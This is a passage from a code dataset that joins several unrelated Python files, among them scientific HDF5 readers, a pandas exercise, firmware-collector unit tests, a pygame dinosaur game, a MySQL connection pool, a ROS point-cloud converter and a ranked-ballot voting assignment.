k in keys:\n str_out.append(dict[k][row])\n\n w.writerow(str_out)\n #endfor\n\n f.close()\n #endwith\n#end dict_to_csv\n\n\n\n#\n# Read CSV file into a dictionary using the header row as dict entry names\n# Result will be a blank dict {} if file does not exist\n#\n# >>> import pandas as pd\n# >>> csv = pd.read_csv('example.csv')\n# >>> csv\n#\ndef csv_to_dict(filename):\n\n # Open CSV file\n result = {}\n\n with open(filename, 'r', newline='') as f:\n\n reader = csv.DictReader(f)\n\n for row in reader:\n for column, value in row.items():\n result.setdefault(column.strip(), []).append(value.strip())\n\n f.close()\n\n # Strip blanks from field names\n fieldnames = list(reader.fieldnames)\n for item, field in enumerate(fieldnames):\n fieldnames[item] = field.strip()\n\n # Add field names to dict\n result.update({'fieldnames' : fieldnames})\n\n return result\n#end csv_to_dict\n\n\n#\n# Read event data using the appropriate reader for the format\n#\ndef read_event(event_list, eventID, data=False, mask=False, peaks=False, photon_energy=False, camera_length=False, num_frames=False, slab_size=False):\n \"\"\"\n Read an event from file\n Calls file-reading function for different file formats as specified in the event list 'format' field\n :param event_list:\n :param eventID:\n :param data:\n :param mask:\n :param peaks:\n :param photon_energy:\n :param camera_length:\n :param num_frames:\n :param slab_size:\n :return:\n \"\"\"\n\n if event_list['format'][eventID] == 'cxi':\n event_data = read_cxi(event_list['filename'][eventID], 
event_list['event'][eventID], data=data, peaks=peaks, mask=mask, photon_energy=photon_energy, camera_length=camera_length, num_frames=num_frames, slab_size=slab_size)\n #end cxi\n\n elif event_list['format'][eventID] == 'cheetah_h5':\n data_array = read_h5(event_list['filename'][eventID], field=event_list['h5field'][eventID])\n event_data = {\n 'data': data_array,\n 'data_shape': data_array.shape,\n 'mask': [0],\n 'nframes': 1,\n 'EncoderValue': 0,\n 'photon_energy_eV': 0,\n 'n_peaks': 0,\n 'peakXPosRaw': [0],\n 'peakYPosRaw': [0]\n }\n #end cheetah_h5\n\n elif event_list['format'][eventID] == 'generic_h5':\n data_array = read_h5(event_list['filename'][eventID], field=event_list['h5field'][eventID])\n event_data = {\n 'data': data_array,\n 'data_shape': data_array.shape,\n 'nframes': 1,\n 'EncoderValue': 0,\n 'photon_energy_eV': 0,\n }\n #end generic_h5\n\n else:\n print(\"Unsupported file format: \", event_list['format'][eventID])\n exit(1)\n #end error\n\n\n return event_data\n\n\n\ndef read_cxi(filename, frameID=0, data=False, mask=False, peaks=False, photon_energy=False, camera_length=False, num_frames=False, slab_size=False):\n \"\"\" \n Read a frame from multi-event CXI file\n Also read mask and peak lists if requested\n Would be smarter to read the requested stuff at once and return it all at the same time from the same file handle\n :param filename:\n :param frameID:\n :param mask:\n :param peaks:\n :param photon_energy:\n :param camera_length:\n :param slab_size:\n :return:\n \"\"\"\n\n # Open CXI file\n hdf5_fh = h5py.File(filename, 'r')\n\n\n # Peak list\n if peaks == True:\n n_peaks = hdf5_fh['/entry_1/result_1/nPeaks'][frameID]\n peakXPosRaw = hdf5_fh['/entry_1/result_1/peakXPosRaw'][frameID]\n peakYPosRaw = hdf5_fh['/entry_1/result_1/peakYPosRaw'][frameID]\n peak_xy = (peakXPosRaw.flatten(), peakYPosRaw.flatten())\n else:\n n_peaks = 0\n peakXPosRaw = np.nan\n peakYPosRaw = np.nan\n\n\n # Masks\n if mask == True:\n mask_array = hdf5_fh['/entry_1/data_1/mask'][frameID, :, :]\n else:\n mask_array = np.nan\n\n\n # Photon energy\n if photon_energy == True:\n photon_energy_eV = hdf5_fh['/LCLS/photon_energy_eV'][frameID]\n #return photon_energy_eV\n else:\n photon_energy_eV = 'nan'\n\n\n # Camera length\n if camera_length == True:\n EncoderValue = hdf5_fh['/LCLS/detector_1/EncoderValue'][frameID]\n else:\n EncoderValue = 'nan'\n\n # Array dimensions\n if slab_size == True:\n size = hdf5_fh['/entry_1/data_1/data'].shape\n data_shape = size[1:]\n else:\n size = [0,0,0]\n data_shape = [0,0]\n\n # Number of frames\n if num_frames == True:\n # For files which have finished being written this can be inferred from the data array shape\n # For files still being written there are blank frames at the end, so look for non-zero entries in x_pixel_size\n # The minimum of these two values is the number of events actually written so far\n size = hdf5_fh['/entry_1/data_1/data'].shape\n nframes_1 = size[0]\n\n pix_size = hdf5_fh['entry_1/instrument_1/detector_1/x_pixel_size'][:]\n nframes_2 = len(np.where(pix_size != 0 )[0])\n\n nframes = np.min([nframes_1, nframes_2])\n else:\n nframes = -1\n\n # Image data\n if data == True:\n data_array = hdf5_fh['/entry_1/data_1/data'][frameID, :, :]\n data_shape = data_array.size\n else:\n data_array = np.nan\n\n\n # Close file\n hdf5_fh.close()\n\n\n # Build return structure\n result = {\n 'data' : data_array,\n 'data_shape' : data_shape,\n 'stack_shape' : size,\n 'mask' : mask_array,\n 'nframes' : nframes,\n 'EncoderValue' : EncoderValue,\n 
'photon_energy_eV' : photon_energy_eV,\n 'n_peaks' : n_peaks,\n 'peakXPosRaw' : peakXPosRaw,\n 'peakYPosRaw' : peakYPosRaw\n }\n return result\n# end read_cxi\n\n\n\n\ndef list_events(pattern='./*.cxi', field='data/data'):\n \"\"\"\n :param file_pattern: Single filename, or search string\n :param field: HDF5 field from which to draw data, can be different for each file, default='data/data'\n :return: List of filenames, eventID and HDF5 field\n\n reload:\n import importlib\n importlib.reload(lib.cfel_filetools)\n from lib.cfel_filetools import *\n \"\"\"\n\n # \"field==none\" means \"use default value\"\n if field=='none':\n field = 'data/data'\n\n # Find all files matching pattern\n files = glob.glob(pattern, recursive=True)\n if len(files) == 0:\n print('No files found matching pattern: ', pattern)\n\n # List the found files (sanity check)\n #print('Found files:')\n #for filename in glob.iglob(pattern, recursive=True):\n # print(filename)\n\n # Create empty event list\n filename_out = []\n eventid_out = []\n fieldname_out = []\n format_out = []\n\n\n #print('Found files:')\n for filename in glob.iglob(pattern, recursive=True):\n\n basename = os.path.basename(filename)\n dirname = os.path.dirname(filename)\n #print(dirname, basename)\n\n # CXI file\n if filename.endswith(\".cxi\"):\n # Number of events in file\n nframes = read_cxi(filename, num_frames=True)['nframes']\n if nframes == 0:\n filename_short = basename\n print(filename_short, ' ', nframes)\n continue\n\n # Default location for data in .cxi files is not data/data\n # But leave option for passing a different hdf5 data path on the command line\n cxi_field = field\n if cxi_field == 'data/data':\n cxi_field = '/entry_1/data_1/data'\n\n # Generate lists for this file\n cxi_filename = [filename] * nframes\n cxi_eventid = list(range(nframes))\n cxi_fieldname = [cxi_field] * nframes\n cxi_format = ['cxi'] * nframes\n\n # Append to main list\n filename_out.extend(cxi_filename)\n eventid_out.extend(cxi_eventid)\n fieldname_out.extend(cxi_fieldname)\n format_out.extend(cxi_format)\n #endif\n\n # Assume .h5 file is a single frame data file (for now)\n # Be more clever about generalising this later on\n # (eg: if number of dimensions of field = 2, it's an image; if number of dimensions = 3 it's a slab)\n if basename.endswith(\".h5\") and basename.startswith(\"LCLS\"):\n nframes = 1\n filename_out.extend([filename])\n eventid_out.extend([0])\n fieldname_out.extend(['data/data'])\n format_out.extend(['cheetah_h5'])\n #endif\n\n elif basename.endswith(\".h5\"):\n nframes = 1\n filename_out.extend([filename])\n eventid_out.extend([0])\n fieldname_out.extend([field])\n format_out.extend(['generic_h5'])\n #endif\n\n\n #filename_short = filename.split('/')[-1]\n filename_short = basename\n print(filename_short, ' ', nframes)\n\n\n #endfor\n\n nevents = len(filename_out)\n #print('Events found: ', nevents)\n\n\n # Build return structure\n result = {\n 'nevents' : nevents,\n 'filename': filename_out,\n 'event': eventid_out,\n 'h5field': fieldname_out,\n 'format': format_out\n }\n return result\n\n# end find_cheetah_images\n\n\n","repo_name":"antonbarty/cheetah-2017","sub_path":"python/lib/cfel_filetools.py","file_name":"cfel_filetools.py","file_ext":"py","file_size_in_byte":14038,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"} +{"seq_id":"15143156506","text":"'''\n\n Merge reshaped and hosts using an inner join. 
Remember, how='inner' is the default behavior for pd.merge().\n Print the first 5 rows of the DataFrame merged. This has been done for you. You should see that the rows are jumbled chronologically.\n Set the index of merged to be 'Edition' and sort the index.\n Print the first 5 rows of the DataFrame influence. This has been done for you, so hit 'Submit Answer' to see the results!\n\n'''\n# Import pandas\nimport pandas as pd\n\n# Merge reshaped and hosts: merged\nmerged = pd.merge(reshaped, hosts)\n\n# Print first 5 rows of merged\nprint(merged.head())\n\n# Set Index of merged and sort it: influence\ninfluence = merged.set_index('Edition').sort_index()\n\n# Print first 5 rows of influence\nprint(influence.head())\n","repo_name":"JohnnyFang/datacamp","sub_path":"10-Merging-DataFrames-with-Pandas/04-case-study-Summer-Olympics/09-merging-to-compute-influence.py","file_name":"09-merging-to-compute-influence.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"70146149522","text":"from __future__ import print_function, division, absolute_import\n\n# Copyright (c) 2016 Red Hat, Inc.\n#\n# This software is licensed to you under the GNU General Public License,\n# version 2 (GPLv2). There is NO WARRANTY for this software, express or\n# implied, including the implied warranties of MERCHANTABILITY or FITNESS\n# FOR A PARTICULAR PURPOSE. You should have received a copy of GPLv2\n# along with this software; if not, see\n# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.\n#\n# Red Hat trademarks are not licensed under GPLv2. No permission is\n# granted to use or replicate Red Hat trademarks that are incorporated\n# in this software or its documentation.\n\ntry:\n import unittest2 as unittest\nexcept ImportError:\n import unittest\n\nimport platform\nimport mock\nfrom test.fixture import open_mock, OPEN_FUNCTION\n\nfrom rhsmlib.facts import collector, firmware_info\nfrom rhsmlib.facts.firmware_info import UuidFirmwareInfoCollector\n\n\nclass GetArchTest(unittest.TestCase):\n @mock.patch('platform.machine')\n def test_returns_arch(self, mock_machine):\n mock_machine.return_value = \"hello_arch\"\n arch = collector.get_arch()\n self.assertEqual(\"hello_arch\", arch)\n\n def test_returns_arch_override(self):\n with open_mock(content=\"hello_arch\"):\n arch = collector.get_arch(prefix=\"/does/not/exist\")\n self.assertEqual(\"hello_arch\", arch)\n\n def test_get_arch(self):\n self.assertEqual(platform.machine(), collector.get_arch())\n\n def test_get_platform_specific_info_provider(self):\n info_provider = firmware_info.get_firmware_collector(arch=platform.machine())\n self.assertTrue(info_provider is not None)\n\n\nclass GetNonDmiUuid(unittest.TestCase):\n def test_get_aarch64_firmware_collector(self):\n firmware_provider_class = firmware_info.get_firmware_collector(arch='aarch64')\n self.assertTrue(isinstance(firmware_provider_class, UuidFirmwareInfoCollector))\n\n @mock.patch(OPEN_FUNCTION, mock.mock_open(read_data=\"356B6CCC-30C4-11B2-A85C-BBB0CCD29F36\"))\n def test_get_aarch64_uuid_collection(self):\n firmware_provider_class = firmware_info.get_firmware_collector(arch='aarch64')\n firmware_provider_class.arch = 'aarch64'\n result = firmware_provider_class.get_all()\n self.assertTrue(result['dmi.system.uuid'] == '356B6CCC-30C4-11B2-A85C-BBB0CCD29F36')\n\n def test_get_aarch64_uuid_collection_no_file(self):\n mock.mock_open(read_data=\"no file\")\n mock.mock_open.side_effect = IOError()\n 
firmware_provider_class = firmware_info.get_firmware_collector(arch='aarch64')\n firmware_provider_class.arch = 'aarch64'\n result = firmware_provider_class.get_all()\n self.assertTrue('dmi.system.uuid' not in result)\n","repo_name":"Lorquas/rhsm","sub_path":"test/rhsmlib_test/test_collector.py","file_name":"test_collector.py","file_ext":"py","file_size_in_byte":2777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34442523854","text":"import numpy as np\nfrom PIL import Image\n\ncolor_lookup = {\n 'Red': (255, 0, 0),\n 'Green': (0, 255, 0),\n 'Blue': (0, 0, 255),\n 'White': (255, 255, 255),\n 'Black': (0, 0, 0),\n 'Yellow': (255, 255, 0),\n 'Cyan': (0, 255, 255),\n 'Magenta': (255, 0, 255),\n 'Silver': (192, 192, 192),\n 'Gray': (128, 128, 128),\n 'Maroon': (128, 0, 0),\n 'Olive': (128, 128, 0),\n 'Purple': (128, 0, 128),\n 'Teal': (0, 128, 128),\n 'Navy': (0, 0, 128),\n}\n\n\nclass Canvas:\n def __init__(self, width, height, color):\n self.width = width\n self.height = height\n self.color = color\n\n def make(self):\n canvas_array = np.zeros((self.height, self.width, 3), dtype=np.uint8)\n if self.color not in color_lookup.keys():\n raise KeyError('Color not supported')\n\n canvas_array[:, :] = color_lookup[self.color]\n return canvas_array\n\n\nclass Rectangle:\n def __init__(self, x, y, width, height, color):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.color = color\n\n def draw(self, canvas_array):\n canvas_array[self.x: self.x + self.width, self.y: self.y + self.height] = color_lookup[self.color]\n\n\nclass Square:\n def __init__(self, x, y, side, color):\n self.x = x\n self.y = y\n self.side = side\n self.color = color\n\n def draw(self, canvas_array):\n canvas_array[self.x: self.x + self.side, self.y: self.y + self.side] = color_lookup[self.color]\n\n\ndef visualize(canvas_array):\n image = Image.fromarray(canvas_array, 'RGB')\n image.save('canvas.png')\n\n\ncanvas_w = int(input('Please enter a canvas width'))\ncanvas_h = int(input('Please enter a canvas height'))\ncanvas_c = input('Enter a Canvas color: e.g. Black')\ncanvas = Canvas(canvas_w, canvas_h, canvas_c).make()\n\nshape_selector = input('What would you like to draw? square, rectangle, quit')\nwhile shape_selector != 'quit':\n if shape_selector not in ('rectangle', 'square'):\n shape_selector = input('please select from one of square, rectangle, quit')\n elif shape_selector == 'rectangle':\n rect_x = int(input('Enter the starting x coordinate of the rectangle'))\n rect_y = int(input('Enter the starting y coordinate of the rectangle'))\n rect_w = int(input('Enter the width of the rectangle'))\n rect_h = int(input('Enter the height of the rectangle'))\n rect_c = input('Enter the color of the rectangle')\n rect = Rectangle(rect_x, rect_y, rect_w, rect_h, rect_c)\n rect.draw(canvas)\n else:\n sq_x = int(input('Enter the starting x coordinate of the Square'))\n sq_y = int(input('Enter the starting y coordinate of the Square'))\n sq_s = int(input('Enter the side of the Square'))\n sq_color = input('Enter the color of the Square')\n sq = Square(sq_x, sq_y, sq_s, sq_color)\n sq.draw(canvas)\n shape_selector = input('What would you like to draw? 
square, rectangle, quit')\n\nvisualize(canvas_array=canvas)\n\n\n","repo_name":"tonys20/math_painter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73500337361","text":"from .base import *\n\n# SECURITY WARNING: don't run with debug turned on in production!\n# Override the default settings for the development environment\n\nDEBUG = False\n\nADMIN_ENABLED = False\n\nDATABASES = {\"default\": {\"ENGINE\": \"djongo\", \"NAME\": \"mantis\"}}\n","repo_name":"GlencoeDev/Mantis","sub_path":"mantisapi/mantisapi/settings/prod.py","file_name":"prod.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40920624961","text":"# -*- coding: utf-8 -*-\n__author__ = 'voirin'\n\n# j'importe OGR\nfrom osgeo import ogr, osr\n\n# Je déclare un système de coordonnées (wgs84)\nspatialReference = osr.SpatialReference()\nspatialReference.ImportFromEPSG(4326)\n\n# je déclare le chemin du fichier à écrire\npath=r'../data/points.shp'\n# je déclare le driver que je veux utiliser\ndriver = ogr.GetDriverByName('ESRI Shapefile')\n# je créé un datasource pour mes données\nshapeData = driver.CreateDataSource(path)\n# je créé une couche de points\nlayer = shapeData.CreateLayer('customs',spatialReference, ogr.wkbPoint)\n\n# je recherche la définition de la couche(attributs)\nlayer_defn = layer.GetLayerDefn()\n# je définis un attribut (nom et type)\nnew_field= ogr.FieldDefn('NAME', ogr.OFTString)\n# je l'ajoute à la couche\nlayer.CreateField(new_field)\n\n# afin de réduire le code, je vais déclarer un tableau avec les informations à écrire pour chaque point\npoints = [\n {'lat': 45.399896, 'lon': -71.884232, 'name': 'Sherbrooke'},\n {'lat': 45.536896, 'lon': -73.510551, 'name': 'Longueuil'}\n ]\ncnt = 0\nfor p in points:\n # je déclare mon objet point\n point = ogr.Geometry(ogr.wkbPoint)\n # voici mon point\n point.AddPoint(p['lon'], p['lat'])\n # voici son index\n featureIndex = cnt\n # je créé l'entité avec la définition des attributs\n feature = ogr.Feature(layer_defn)\n # je lui associe une géométrie\n feature.SetGeometry(point)\n # je définis l'index\n feature.SetFID(featureIndex)\n # je vais ajouter la valeur d'un attribut\n feature.SetField(\"NAME\",p['name'])\n # j'ajoute l'entité a la couche\n layer.CreateFeature(feature)\n cnt += 1\n\n# je termine l'édition\nshapeData.Destroy()","repo_name":"yvoirin/cookbook_python3","sub_path":"Creating files/write_shpfile.py","file_name":"write_shpfile.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"fr","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"74210119440","text":"# 8) Write a python program to find the longest words\r\n\r\nfl=open('std.txt','a')\r\n\r\nfl.write(\"Hi....\")\r\nfl.write(\"\\n My Name Is Sanjay\")\r\nfl.write(\"\\n I From DevBhumiDwarka\")\r\nfl.write(\"\\n My Hobbie Is Playing Cricket\")\r\nfl.write(\"\\n I love to Traveling\")\r\nfl.close()\r\n\r\nfl=open('std.txt','r+')\r\nlw=fl.read().split()\r\nlnw=len(max(lw, key=len))\r\nresult=[textword for textword in lw if len(textword) == 
lnw]\r\nprint(result)","repo_name":"Sanjay000008/26Apr_Assignment_modual4","sub_path":"assign_modual_4/8.logest_word.py","file_name":"8.logest_word.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"44196673671","text":"import pygame\nimport time as tm\nfrom random import randint\n\npygame.init()\n\n# Queste sono le sprite\ndino = pygame.image.load('immagini/dino.png')\ndino2 = pygame.image.load('immagini/dino2.png')\ndino3 = pygame.image.load('immagini/dino3.png')\npavimento = pygame.image.load('immagini/pavimento.png')\ncactus = pygame.image.load('immagini/Cactus.png')\ncactus2 = pygame.image.load('immagini/Cactus2.png')\ncactus3 = pygame.image.load('immagini/Cactus3.png')\ncactus4 = pygame.image.load('immagini/Cactus4.png')\ncactusGroup = pygame.image.load('immagini/CactusGroup.png')\ncloud = pygame.image.load('immagini/cloud.png')\ngameOver = pygame.image.load('immagini/gameover.png')\n\n# Array con gli sprite\ncammina = [dino, dino, dino, dino2, dino2, dino2, dino3, dino3, dino3]\nostacoli = [cactus, cactus2, cactus3, cactus4, cactusGroup]\n\n# Costanti del gioco\nclock = pygame.time.Clock()\nlast_time = 0 #tm.time()\nSCHERMO = pygame.display.set_mode((600, 300))\npygame.display.set_caption(\"DinoGame! %d FPS\" % clock.get_fps())\nFPS = 60\nFONT = pygame.font.SysFont('Comic Sans MS', 20, bold=False)\n\n# Variabile booleana che per il main loop\nrunning = True\n\n\nclass Cloud:\n def __init__(self):\n self.x = 650\n self.y = randint(10, 150)\n\n def generate(self):\n self.x -= AVANZ * dt\n SCHERMO.blit(cloud, (self.x, self.y))\n\n\n# Classe Cactus\nclass Cactus:\n def __init__(self):\n self.x = 700\n self.y = randint(200, 210)\n self.rnd = randint(0, 4)\n\n def drawself(self):\n self.x -= AVANZ * dt\n SCHERMO.blit(ostacoli[self.rnd], (self.x, self.y))\n\n def collision(self, dino, dinox, dinoy):\n tollerance = 5\n dinodx = dinox + dino.get_width() - tollerance\n dinosx = dinox + tollerance\n cactusdx = self.x + ostacoli[self.rnd].get_width()\n cactussx = self.x\n dinoup = dinoy - tollerance\n dinodown = dinoy + dino.get_height() - tollerance\n cactusup = self.y\n cactusdown = self.y - 5\n if self.x <= -10:\n cacti.remove(self)\n if dinodx > cactussx and dinosx < cactusdx:\n if dinoup < cactusup and dinodown > cactusdown:\n gameover()\n\n\n# Inizializzo le variabili globali\ndef initialize():\n global dinox, dinoy, dinovely, jumping\n global pavx, pavy, pavx2, pavy2\n global walkpoint\n global cacti\n global score, time\n global DIFF\n global clouds\n global AVANZ\n # DIFF = pygame.event.Event(DIFF)\n # pygame.time.set_timer(DIFF, 10000)\n dinox, dinoy, dinovely, jumping = 70, 200, 0, False\n pavx, pavy = 0, 235\n walkpoint = 0\n AVANZ = 250\n cacti = [Cactus()]\n clouds = [Cloud()]\n score, time = 0, 0\n\n\n# Chiamo la funzione inizializza\ninitialize()\n\n\n# Definisco una funzione che aggiorna ogni frame lo schermo\ndef draw():\n SCHERMO.fill((255, 255, 255))\n SCHERMO.blit(pavimento, (pavx, pavy))\n SCHERMO.blit(pavimento, (pavx + 1200, pavy))\n for c in cacti:\n c.drawself()\n for i in clouds:\n i.generate()\n SCHERMO.blit(cammina[walkpoint], (dinox, dinoy))\n scoreRender = FONT.render(str(int(score)), 1, (0, 0, 0))\n SCHERMO.blit(scoreRender, (450, 10))\n\n\n# Qui definisco una funzione per creare un \"timer\" che manda avanti il gioco definendo i \"Tick\" del gioco\ndef update():\n pygame.display.update()\n clock.tick(FPS)\n\n\ndef gameover():\n SCHERMO.blit(gameOver, (200, 
150))\n update()\n dead = True\n while dead:\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE:\n initialize()\n dead = False\n if event.type == pygame.QUIT:\n running = False\n dead = False\n quit()\n\n\n# Main loop del gioco, dove avvengono la maggior parte dei calcoli\nwhile running:\n t = pygame.time.get_ticks()\n dt = (t - last_time)/1000.0\n last_time = t\n\n score += 0.166\n time += 0.016\n pavx -= AVANZ * dt\n\n if pavx <= -1200:\n pavx = 0\n\n if time > 10:\n time = 0\n AVANZ *= 1.1\n if dinoy >= 200:\n jumping = False\n dinoy = 200\n dinovely = 0\n if jumping and dinoy <= 120:\n dinovely += 50 * dt\n walkpoint = 0\n for event in pygame.event.get():\n if event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE:\n if not jumping:\n jumping = True\n dinovely = -500 * dt\n\n if event.type == pygame.QUIT:\n running = False\n\n dinoy += dinovely\n\n if walkpoint > 8:\n walkpoint = 0\n\n if cacti[-1].x < randint(-10, 200):\n cacti.append(Cactus())\n# if cacti[-1].x < -10:\n# cacti.pop(-2)\n if clouds[-1].x < -10:\n clouds.remove(clouds[-1])\n if len(clouds) > 0:\n if clouds[-1].x < randint(-10, 300):\n clouds.append(Cloud())\n\n for c in cacti:\n c.collision(dino, dinox, dinoy)\n\n draw()\n walkpoint += 1\n update()\n\n# In caso si clicchi la X per uscire dal gioco viene chiamato il method quit()\ndef quit():\n pygame.quit()\n","repo_name":"ronnye0802/GoogleDino","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5087,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11075572619","text":"#standardization and normalization\n\n\nfrom sklearn.preprocessing import StandardScaler\nimport pandas as pd\nex = pd.DataFrame([0,1,2,3,4,5])\nex[1] = (ex[0]-ex[0].mean())/ex[0].std(ddof=0)\nex[2] = (ex[0]-ex[0].min())/(ex[0].max()-ex[0].min())\nex.columns = ['input','standardization', 'normalization']\nprint(ex)","repo_name":"ChocolatePadmanaban/Learning_python","sub_path":"Day16/part7.py","file_name":"part7.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"73463575440","text":"# coding=utf-8\r\n\r\nimport pymysql\r\nimport queue\r\nfrom k8s import settings\r\nimport logging\r\nlogger = logging.getLogger('sourceDns.webdns.views')\r\n\r\n\r\nREQUIRED_PARAMS = [\"host\", \"user\", \"passwd\", \"db\"]\r\nDB_CONNET = {'host': '192.168.3.105',\r\n 'port': 3306,\r\n 'user': 'root',\r\n 'passwd': 'rrjc2018',\r\n 'db': 'kubernetes'}\r\n\r\n\r\nclass ConnectionPool():\r\n\r\n def __init__(self, maxsize=10, **kwargs):\r\n self.kwargs = DB_CONNET\r\n\r\n self._queue = queue.Queue(maxsize=maxsize)\r\n\r\n for i in range(maxsize):\r\n self._queue.put(self._create())\r\n\r\n def _create(self):\r\n for param in REQUIRED_PARAMS:\r\n if self.kwargs.get(param, None) is None:\r\n raise Exception(\r\n \"Instantiation failed, '{0}' param is not found.\".format(\r\n param\r\n )\r\n )\r\n\r\n return pymysql.connect(**DB_CONNET, cursorclass=pymysql.cursors.DictCursor)\r\n\r\n def _put(self, conn):\r\n self._queue.put(conn)\r\n\r\n def _get(self):\r\n conn = self._queue.get()\r\n if conn is None:\r\n return self._create()\r\n\r\n return conn\r\n\r\n def execute(self, sql, args=None, exec_many=False, return_one=False):\r\n \"\"\"\r\n 执行 sql 操作\r\n :param sql: sql 语句\r\n :param args: 对应参数\r\n :param exec_many: 是否开启 `cur.executemany(sql, args)`\r\n :param return_one: 是否开启 
`cur.fetchone()`\r\n \"\"\"\r\n conn = self._get()\r\n try:\r\n with conn as cur:\r\n if exec_many:\r\n cur.executemany(sql, args)\r\n else:\r\n cur.execute(sql, args)\r\n return cur.fetchone() if return_one else cur.fetchall()\r\n\r\n except Exception as e:\r\n raise e\r\n\r\n finally:\r\n self._queue.put(conn)\r\n\r\n @property\r\n def size(self):\r\n return self._queue.qsize()\r\n\r\n def __del__(self):\r\n \"\"\"\r\n 确保每个链接实例最后都会被释放\r\n \"\"\"\r\n while not self._queue.empty():\r\n conn = self._queue.get_nowait()\r\n if conn:\r\n conn.close()\r\n\r\n# pool = ConnectionPool(\r\n# # maxsize=100, maxsize 非必须,用于指定最大连接数\r\n# host=\"192.168.3.105\",\r\n# port=3306,\r\n# user=\"root\",\r\n# passwd=\"rrjc2018\",\r\n# db=\"kubernetes\"\r\n# )\r\n","repo_name":"airring/k8s_install","sub_path":"script/pymysql.py","file_name":"pymysql.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"42399038291","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport rospy\nimport ros_numpy\nimport numpy as np\n\nfrom sensor_msgs.msg import Image\nfrom sensor_msgs.msg import PointCloud2\n\nclass Pc2ToImage():\n def __init(self):\n self.pc2_topic = rospy.get_param(\"~input_pc2_topic\")\n self.image_topic = rospy.get_param(\"~output_image_topic\")\n\n # node\n self.sub_pc2 = rospy.Subscriber(self.pc2_topic, PointCloud2, self.pc2_callback, queue_size=1)\n self.pub_image = rospy.Publisher(self.image_topic, Image, queue_size=1)\n \n def pc2_callback(self, _pc2_msg):\n self.pub_image.publish(self.generate_image(_pc2_msg))\n\n # generate image from pc2\n def generate_image(self, pc2_msg):\n # picture size\n height = pc2_msg.height\n width = pc2_msg.width\n\n # convert\n array = np.zeros((height, width), dtype=np.float32)\n\n # save data to arrary\n pc2_original = ros_numpy.numpify(pc2_msg)\n array[:, :] = pc2_original['rgb']\n\n # convert color (html color -> rgb)\n data = array.view(np.uint8).reshape(array.shape + (4,))[..., :3]\n image = ros_numpy.msgify(Image, data, encoding='bgr8')\n return image\n\ndef main():\n rospy.init_node(\"pc2_to_image\")\n\n print(\"===== PointCloud2 to Image Convertor ======================\")\n pc2_to_image = Pc2ToImage()\n\n rospy.spin()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Shunmo17/ros-pc2_tools","sub_path":"scripts/pc2_to_image.py","file_name":"pc2_to_image.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"43357676119","text":"# COMP 202 A3\n# Name: Yimei Yang\n# ID: 260898303\nimport math\nfrom single_winner import *\n\n################################################################################\n\ndef votes_needed_to_win(ballots, num_winners):\n '''\n >>> votes_needed_to_win([{'CPC':3, 'NDP':5}, {'NDP':2, 'CPC':4}, \\\n {'CPC':3, 'NDP':5}], 1)\n 2\n >>> votes_needed_to_win(['g']*20, 2)\n 7\n '''\n #get the total number of votes as the length of input\n total_num = len(ballots)\n #round down\n round_down = math.floor(total_num/(num_winners+1)+1)\n return round_down\n \n\n\ndef has_votes_needed(result, votes_needed):\n '''\n >>> has_votes_needed({'NDP': 4, 'LIBERAL': 3}, 4)\n True\n >>> has_votes_needed({}, 2)\n False\n >>> has_votes_needed({'LIBERAL': 2}, 3)\n True\n '''\n #if there are more than one candidates, compare their votes with votes_needed\n if(len(result) >1):\n Max = get_winner(result)\n return (result[Max] >= votes_needed)\n #if there is 
only one candidate, the candidate is the winner\n elif (len(result)==1):\n return True\n #if the input is empty, return false\n else:\n return False\n \n\n\n################################################################################\n\n\ndef eliminate_candidate(ballots, to_eliminate):\n '''\n >>> eliminate_candidate([['NDP', 'LIBERAL'], ['GREEN', 'NDP'], \\\n ['NDP', 'BLOC']], ['NDP', 'LIBERAL'])\n [[], ['GREEN'], ['BLOC']]\n >>> eliminate_candidate([['NDP', 'LIBERAL'], ['GREEN', 'NDP'], \\\n ['NDP', 'BLOC']], ['NDP', 'LIBERAL'])\n [[], ['GREEN'], ['BLOC']]\n '''\n element_need = []\n #loop through all elements in the input\n for index, element in enumerate(ballots):\n value_need = []\n #add elements that are not in the to_eliminate list\n for value in element:\n if value not in to_eliminate:\n value_need.append(value)\n element_need.append(value_need)\n return element_need\n\n################################################################################\n\n\ndef count_irv(ballots):\n '''\n >>> pr_dict(count_irv([['NDP'], ['GREEN', 'NDP', 'BLOC'], ['LIBERAL','NDP'],\\\n ['LIBERAL'], ['NDP', 'GREEN'], ['BLOC', 'GREEN', 'NDP'],\\\n ['BLOC', 'CPC'], ['LIBERAL', 'GREEN'], ['NDP']]))\n {'BLOC': 0, 'CPC': 0, 'GREEN': 0, 'LIBERAL': 3, 'NDP': 5}\n >>> pr_dict(count_irv([['GREEN'], ['LIBERAL', 'CPC'], \\\n ['BLOC', 'LIBERAL'],['GREEN'], ['CPC', 